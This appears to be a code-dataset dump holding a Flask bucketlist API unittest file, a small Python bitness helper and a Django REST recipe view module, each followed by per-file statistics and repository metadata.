content_type='application/json',
)
data = json.loads(resp_register.data.decode())
token = data['access_token']
# create bucket
response = self.client.post(
'/api/v1/bucketlists',
data=json.dumps(dict(
name='Travel to bermuda'
)),
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
data = json.loads(response.data.decode())
self.assertTrue(data['message'] == "Bucketlist successfully created!")
self.assertEqual(response.status_code, 201)
def test_duplicate_buckectlist(self):
with self.client:
# user register
response = self.client.post(
'/api/v1/auth/register',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json'
)
# user login
resp_register = self.client.post(
'/api/login',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json',
)
data = json.loads(resp_register.data.decode())
token = data['access_token']
# create bucket
response = self.client.post(
'/api/v1/bucketlists',
data=json.dumps(dict(
name='Travel to bermuda'
)),
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
data = json.loads(response.data.decode())
self.assertTrue(data['message'] == "Bucketlist successfully created!")
self.assertEqual(response.status_code, 201)
# create same sbucket
response = self.client.post(
'/api/v1/bucketlists',
data=json.dumps(dict(
name='Travel to bermuda'
)),
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
data = json.loads(response.data.decode())
self.assertTrue(data['message'] == "Bucketlist already exists")
self.assertEqual(response.status_code, 400)
def test_add_item(self):
with self.client:
# user register
response = self.client.post(
'/api/v1/auth/register',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json'
)
# user login
resp_register = self.client.post(
'/api/login',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json',
)
data = json.loads(resp_register.data.decode())
token = data['access_token']
# create bucket
response = self.client.post(
'/api/v1/bucketlists',
data=json.dumps(dict(
name='Travel to bermuda'
)),
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
# create item
response = self.client.post(
'/api/v1/bucketlists/1/items',
data=json.dumps(dict(
item_name='Trav to ernder'
)),
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
data = json.loads(response.data.decode())
self.assertTrue(data['message'] == "Item successfully created!")
self.assertEqual(response.status_code, 201)
def test_create_item_without_name(self):
with self.client:
# user register
response = self.client.post(
'/api/v1/auth/register',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json'
)
# user login
resp_register = self.client.post(
'/api/login',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json',
)
data = json.loads(resp_register.data.decode())
token = data['access_token']
# create bucket
response = self.client.post(
'/api/v1/bucketlists',
data=json.dumps(dict(
)),
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
# create tem
response = self.client.post(
'/api/v1/bucketlists/1/items',
data=json.dumps(dict(
)),
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
data = json.loads(response.data.decode())
self.assertTrue(data['message'] == "You did not include an Item name.")
self.assertEqual(response.status_code, 400)
def test_create_bucketlist_with_empty_name_string(self):
with self.client:
# user register
response = self.client.post(
'/api/v1/auth/register',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json'
)
# user login
resp_register = self.client.post(
'/api/login',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json',
)
data = json.loads(resp_register.data.decode())
token = data['access_token']
# create bucket
response = self.client.post(
'/api/v1/bucketlists',
data=json.dumps(dict(
name=""
)),
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
data = json.loads(response.data.decode())
self.assertTrue(data['message'] == "The bucketlist name is too short.")
self.assertEqual(response.status_code, 400)
def test_create_item_with_empty_name_string(self):
with self.client:
# user register
response = self.client.post(
'/api/v1/auth/register',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json'
)
# user login
resp_register = self.client.post(
'/api/login',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json',
)
data = json.loads(resp_register.data.decode())
token = data['access_token']
# create bucket
response = self.client.post(
'/api/v1/bucketlists',
data=json.dumps(dict(
name=""
)),
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
# create item
response = self.client.post(
'/api/v1/bucketlists/1/items',
data=json.dumps(dict(
item_name=""
)),
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
data = json.loads(response.data.decode())
self.assertTrue(data['message'] == "The item name is too short.")
self.assertEqual(response.status_code, 400)
def test_lists_bucketlists(self):
with self.client:
# user register
response = self.client.post(
'/api/v1/auth/register',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json'
)
# user login
resp_register = self.client.post(
'/api/login',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json',
)
data = json.loads(resp_register.data.decode())
token = data['access_token']
# create bucket
response = self.client.post(
'/api/v1/bucketlists',
data=json.dumps(dict(
name='Travel to bermuda'
)),
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
data = json.loads(response.data.decode())
self.assertTrue(data['message'] == "Bucketlist successfully created!")
self.assertEqual(response.status_code, 201)
# request for bucketlists
response = self.client.get('/api/v1/bucketlists',
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
self.assertEqual(response.status_code, 200)
def test_list_single_bucketlist(self):
with self.client:
# user register
response = self.client.post(
'/api/v1/auth/register',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json'
)
# user login
resp_register = self.client.post(
'/api/login',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json',
)
data = json.loads(resp_register.data.decode())
token = data['access_token']
# create bucket
response = self.client.post(
'/api/v1/bucketlists',
data=json.dumps(dict(
name='Travel to bermuda'
)),
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
data = json.loads(response.data.decode())
self.assertTrue(data['message'] == "Bucketlist successfully created!")
self.assertEqual(response.status_code, 201)
# request for bucketlists
response = self.client.get('/api/v1/bucketlists/1',
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
self.assertEqual(response.status_code, 200)
def test_updates_bucketlist(self):
with self.client:
# user register
response = self.client.post(
'/api/v1/auth/register',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json'
)
# user login
resp_register = self.client.post(
'/api/login',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json',
)
data = json.loads(resp_register.data.decode())
token = data['access_token']
# create bucket
response = self.client.post(
'/api/v1/bucketlists',
data=json.dumps(dict(
name='Travel to bermuda'
)),
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
data = json.loads(response.data.decode())
# update bucket
response = self.client.put(
'/api/v1/bucketlists/1',
data=json.dumps(dict(
name='Travel to wendani'
)),
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
data = json.loads(response.data.decode())
self.assertEqual(response.status_code, 200)
def test_updates_items(self):
with self.client:
# user register
response = self.client.post(
'/api/v1/auth/register',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json'
)
# user login
resp_register = self.client.post(
'/api/login',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json',
)
data = json.loads(resp_register.data.decode())
token = data['access_token']
# create bucket
response = self.client.post(
'/api/v1/bucketlists',
data=json.dumps(dict(
name='Travel to bermuda'
)),
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
data = json.loads(response.data.decode())
# update bucket
response = self.client.put(
'/api/v1/bucketlists/1',
data=json.dumps(dict(
name='Travel to wendani'
)),
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
data = json.loads(response.data.decode())
self.assertEqual(response.status_code, 200)
def test_deletes_bucketlist(self):
with self.client:
# user register
response = self.client.post(
'/api/v1/auth/register',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json'
)
# user login
resp_register = self.client.post(
'/api/login',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json',
)
data = json.loads(resp_register.data.decode())
token = data['access_token']
# create bucket
response = self.client.post(
'/api/v1/bucketlists',
data=json.dumps(dict(
name='Travel to bermuda'
)),
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
data = json.loads(response.data.decode())
# create item
response = self.client.post(
'/api/v1/bucketlists/1/items',
data=json.dumps(dict(
item_name="Read the whole bible"
)),
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
# delete item
response = self.client.delete(
'/api/v1/bucketlists/1/items/1',
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
data = json.loads(response.data.decode())
self.assertEqual(response.status_code, 200)
def test_deletes_invalid_bucketlist(self):
with self.client:
# user register
response = self.client.post(
'/api/v1/auth/register',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json'
)
# user login
resp_register = self.client.post(
'/api/login',
data=json.dumps(dict(
username='jom',
password='123456'
)),
content_type='application/json',
)
data = json.loads(resp_register.data.decode())
token = data['access_token']
# create bucket
response = self.client.post(
'/api/v1/bucketlists',
data=json.dumps(dict(
name='Travel to bermuda'
)),
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
data = json.loads(response.data.decode())
# delete buckectlist
response = self.client.delete(
'/api/v1/bucketlists/26',
headers={"Authorization": "JWT {}".format(token)},
content_type='application/json'
)
data = json.loads(response.data.decode())
self.assertEqual(response.status_code, 404)
def tearDown(self):
"""Tears down all test_db data and resets db to empty state"""
with self.app.app_context():
db.session.remove()
db.drop_all()
if __name__ == "__main__":
unittest.main()
| 35.633956
| 88
| 0.471478
| 1,960
| 22,877
| 5.407143
| 0.066837
| 0.061898
| 0.112097
| 0.132478
| 0.922627
| 0.919702
| 0.915173
| 0.904039
| 0.904039
| 0.876864
| 0
| 0.020471
| 0.417056
| 22,877
| 641
| 89
| 35.689548
| 0.77422
| 0.035669
| 0
| 0.807763
| 0
| 0
| 0.15594
| 0.023452
| 0
| 0
| 0
| 0
| 0.053604
| 1
| 0.033272
| false
| 0.051756
| 0.016636
| 0
| 0.051756
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
3668328057acf9fd96d68e25d328c08fdf7035c8
| 175
|
py
|
Python
|
src/aestheta/environment.py
|
NSCC-COGS/Aestheta
|
527517c64b03cf4206a177b3bd0fe223c8ef386a
|
[
"MIT"
] | 8
|
2021-01-26T13:43:09.000Z
|
2022-02-03T20:15:42.000Z
|
src/aestheta/environment.py
|
NSCC-COGS/Aestheta
|
527517c64b03cf4206a177b3bd0fe223c8ef386a
|
[
"MIT"
] | 62
|
2021-02-09T14:42:13.000Z
|
2021-05-03T18:26:16.000Z
|
src/aestheta/environment.py
|
NSCC-COGS/Aestheta
|
527517c64b03cf4206a177b3bd0fe223c8ef386a
|
[
"MIT"
] | 3
|
2021-01-26T13:43:12.000Z
|
2021-02-04T12:31:55.000Z
|
import struct
#import toml
def bitness():
return struct.calcsize("P") * 8
#def load_config():
# with open('Config/config.toml') as f:
# return toml.load(f)
| 19.444444
| 42
| 0.628571
| 25
| 175
| 4.36
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007353
| 0.222857
| 175
| 9
| 43
| 19.444444
| 0.794118
| 0.554286
| 0
| 0
| 0
| 0
| 0.013333
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
36f7be87d19e7754de6a2a7667c21f3c10cf9935
| 14,042
|
py
|
Python
|
recipes/views.py
|
kayoslab/CookbookAPI
|
4a80c486bdcdf238514bd2035b371d640f6ab2ed
|
[
"MIT"
] | null | null | null |
recipes/views.py
|
kayoslab/CookbookAPI
|
4a80c486bdcdf238514bd2035b371d640f6ab2ed
|
[
"MIT"
] | null | null | null |
recipes/views.py
|
kayoslab/CookbookAPI
|
4a80c486bdcdf238514bd2035b371d640f6ab2ed
|
[
"MIT"
] | null | null | null |
from django.http import HttpResponse
from django.views.decorators.csrf import csrf_exempt
from django.db.models import QuerySet
from rest_framework.renderers import JSONRenderer
from rest_framework.parsers import JSONParser
from rest_framework import status
from recipes.models import Recipe
from recipes.serializers import RecipeSerializer
from drf_yasg.utils import swagger_auto_schema
from drf_yasg import openapi
from rest_framework.views import APIView
class JSONResponse(HttpResponse):
def __init__(self, data, **kwargs):
content = JSONRenderer().render(data)
kwargs['content_type'] = 'application/json'
super(JSONResponse, self).__init__(content, **kwargs)
class RecipeListView(APIView):
@csrf_exempt
@swagger_auto_schema(
operation_description="Gets a list of Recipe objects.",
responses={
200: RecipeSerializer(many=True)
},
tags=['Recipe'],
)
def get(self, request, *args, **kwargs):
objects: QuerySet[Recipe] = Recipe.objects.all()
serializer = RecipeSerializer(objects, many=True)
return JSONResponse(serializer.data)
@csrf_exempt
@swagger_auto_schema(
operation_description="Creates a new Recipe entry.",
request_body=openapi.Schema(
type=openapi.TYPE_OBJECT,
required=['name'],
properties={
'name': openapi.Schema(
description='The recipes unique name.',
type=openapi.TYPE_STRING
),
'url': openapi.Schema(
description="""
The URL from which the recipe comes originally.
This URL will be used to download a pdf export of the recipe
to allow traceability and long term storage.
""",
type=openapi.TYPE_STRING
),
'note': openapi.Schema(
description="""
A descriptive text which might be helpful finding the recipe
again when using the search functionality. You might want to
write what was good and bad, but also additional information
and significant facts are usefull for indexing.
""",
type=openapi.TYPE_STRING
),
'cuisine_ids': openapi.Schema(
description="""
A list of cuisines unique ids in order to link an existing
cuisine to the recipe.
""",
type=openapi.TYPE_ARRAY,
items=openapi.Items(type=openapi.TYPE_INTEGER),
),
'diet_ids': openapi.Schema(
description="""
A list of diets unique ids in order to link an existing
diet to the recipe.
""",
type=openapi.TYPE_ARRAY,
items=openapi.Items(type=openapi.TYPE_INTEGER),
),
'ingredient_ids': openapi.Schema(
description="""
A list of ingredients unique ids in order to link an existing
ingredient to the recipe.
""",
type=openapi.TYPE_ARRAY,
items=openapi.Items(type=openapi.TYPE_INTEGER),
),
'occasion_ids': openapi.Schema(
description="""
A list of occasions unique ids in order to link an existing
occasion to the recipe.
""",
type=openapi.TYPE_ARRAY,
items=openapi.Items(type=openapi.TYPE_INTEGER),
),
},
),
responses={
200: RecipeSerializer(many=False),
400: """
The required request parameters are not met or an expected
object could not be retrieved from the data store.
""",
},
tags=['Recipe'],
)
def post(self, request):
data = JSONParser().parse(request)
serializer = RecipeSerializer(data=data)
if serializer.is_valid():
serializer.save()
return JSONResponse(
serializer.data,
status=status.HTTP_201_CREATED
)
return JSONResponse(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST
)
class RecipeDetailView(APIView):
@csrf_exempt
@swagger_auto_schema(
operation_description="Gets a Recipe object for a given id.",
responses={
200: RecipeSerializer(many=False),
404: """
The object could not be retrieved, since it doesn't exist.
""",
},
tags=['Recipe'],
)
def get(self, request, pk):
try:
data = Recipe.objects.get(pk=pk)
except Recipe.DoesNotExist:
return HttpResponse(
status=status.HTTP_404_NOT_FOUND
)
serializer = RecipeSerializer(data)
return JSONResponse(serializer.data)
@csrf_exempt
@swagger_auto_schema(
operation_description="Updates a Recipe object with a given id.",
request_body=openapi.Schema(
type=openapi.TYPE_OBJECT,
required=['name'],
properties={
'name': openapi.Schema(
description='The recipes unique name.',
type=openapi.TYPE_STRING
),
'url': openapi.Schema(
description="""
The URL from which the recipe comes originally.
This URL will be used to download a pdf export of the recipe
to allow traceability and long term storage.
""",
type=openapi.TYPE_STRING
),
'note': openapi.Schema(
description="""
A descriptive text which might be helpful finding the recipe
again when using the search functionality. You might want to
write what was good and bad, but also additional information
and significant facts are usefull for indexing.
""",
type=openapi.TYPE_STRING
),
'cuisine_ids': openapi.Schema(
description="""
A list of cuisines unique ids in order to link an existing
cuisine to the recipe.
""",
type=openapi.TYPE_ARRAY,
items=openapi.Items(type=openapi.TYPE_INTEGER),
),
'diet_ids': openapi.Schema(
description="""
A list of diets unique ids in order to link an existing
diet to the recipe.
""",
type=openapi.TYPE_ARRAY,
items=openapi.Items(type=openapi.TYPE_INTEGER),
),
'ingredient_ids': openapi.Schema(
description="""
A list of ingredients unique ids in order to link an existing
ingredient to the recipe.
""",
type=openapi.TYPE_ARRAY,
items=openapi.Items(type=openapi.TYPE_INTEGER),
),
'occasion_ids': openapi.Schema(
description="""
A list of occasions unique ids in order to link an existing
occasion to the recipe.
""",
type=openapi.TYPE_ARRAY,
items=openapi.Items(type=openapi.TYPE_INTEGER),
),
},
),
responses={
200: RecipeSerializer(many=False),
400: """
The required request parameters are not met or an expected
object could not be retrieved from the data store.
""",
404: """
The object could not be updated, since it doesn't exist.
""",
},
tags=['Recipe'],
)
def put(self, request, pk):
try:
data = Recipe.objects.get(pk=pk)
except Recipe.DoesNotExist:
return HttpResponse(
status=status.HTTP_404_NOT_FOUND
)
parsed_data = JSONParser().parse(request)
serializer = RecipeSerializer(
data,
data=parsed_data
)
if serializer.is_valid():
serializer.save()
return JSONResponse(serializer.data)
return JSONResponse(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST
)
@csrf_exempt
@swagger_auto_schema(
operation_description="Updates a Recipe object with a given id.",
request_body=openapi.Schema(
type=openapi.TYPE_OBJECT,
required=[],
properties={
'name': openapi.Schema(
description='The recipes unique name.',
type=openapi.TYPE_STRING
),
'url': openapi.Schema(
description="""
The URL from which the recipe comes originally.
This URL will be used to download a pdf export of the recipe
to allow traceability and long term storage.
""",
type=openapi.TYPE_STRING
),
'note': openapi.Schema(
description="""
A descriptive text which might be helpful finding the recipe
again when using the search functionality. You might want to
write what was good and bad, but also additional information
and significant facts are usefull for indexing.
""",
type=openapi.TYPE_STRING
),
'cuisine_ids': openapi.Schema(
description="""
A list of cuisines unique ids in order to link an existing
cuisine to the recipe.
""",
type=openapi.TYPE_ARRAY,
items=openapi.Items(type=openapi.TYPE_INTEGER),
),
'diet_ids': openapi.Schema(
description="""
A list of diets unique ids in order to link an existing
diet to the recipe.
""",
type=openapi.TYPE_ARRAY,
items=openapi.Items(type=openapi.TYPE_INTEGER),
),
'ingredient_ids': openapi.Schema(
description="""
A list of ingredients unique ids in order to link an existing
ingredient to the recipe.
""",
type=openapi.TYPE_ARRAY,
items=openapi.Items(type=openapi.TYPE_INTEGER),
),
'occasion_ids': openapi.Schema(
description="""
A list of occasions unique ids in order to link an existing
occasion to the recipe.
""",
type=openapi.TYPE_ARRAY,
items=openapi.Items(type=openapi.TYPE_INTEGER),
),
},
),
responses={
200: RecipeSerializer(many=False),
400: """
The required request parameters are not met or an expected
object could not be retrieved from the data store.
""",
404: """
The object could not be updated, since it doesn't exist.
""",
},
tags=['Recipe'],
)
def patch(self, request, pk):
try:
data = Recipe.objects.get(pk=pk)
except Recipe.DoesNotExist:
return HttpResponse(
status=status.HTTP_404_NOT_FOUND
)
parsed_data = JSONParser().parse(request)
serializer = RecipeSerializer(
data,
data=parsed_data,
partial=True
)
if serializer.is_valid():
serializer.save()
return JSONResponse(serializer.data)
return JSONResponse(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST
)
@csrf_exempt
@swagger_auto_schema(
operation_description="Deletes a Recipe object with a given id.",
responses={
203: None,
404: """
The object could not be deleted, since it doesn't exist.
""",
},
tags=['Recipe'],
)
def delete(self, request, pk):
try:
data = Recipe.objects.get(pk=pk)
except Recipe.DoesNotExist:
return HttpResponse(
status=status.HTTP_404_NOT_FOUND
)
data.delete()
return HttpResponse(status=status.HTTP_204_NO_CONTENT)
| 39.666667
| 94
| 0.485615
| 1,253
| 14,042
| 5.34158
| 0.146848
| 0.059166
| 0.080681
| 0.056029
| 0.860899
| 0.848947
| 0.83789
| 0.834155
| 0.816525
| 0.816525
| 0
| 0.008458
| 0.44431
| 14,042
| 353
| 95
| 39.779037
| 0.849289
| 0
| 0
| 0.794721
| 0
| 0
| 0.384062
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.020528
| false
| 0
| 0.032258
| 0
| 0.099707
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.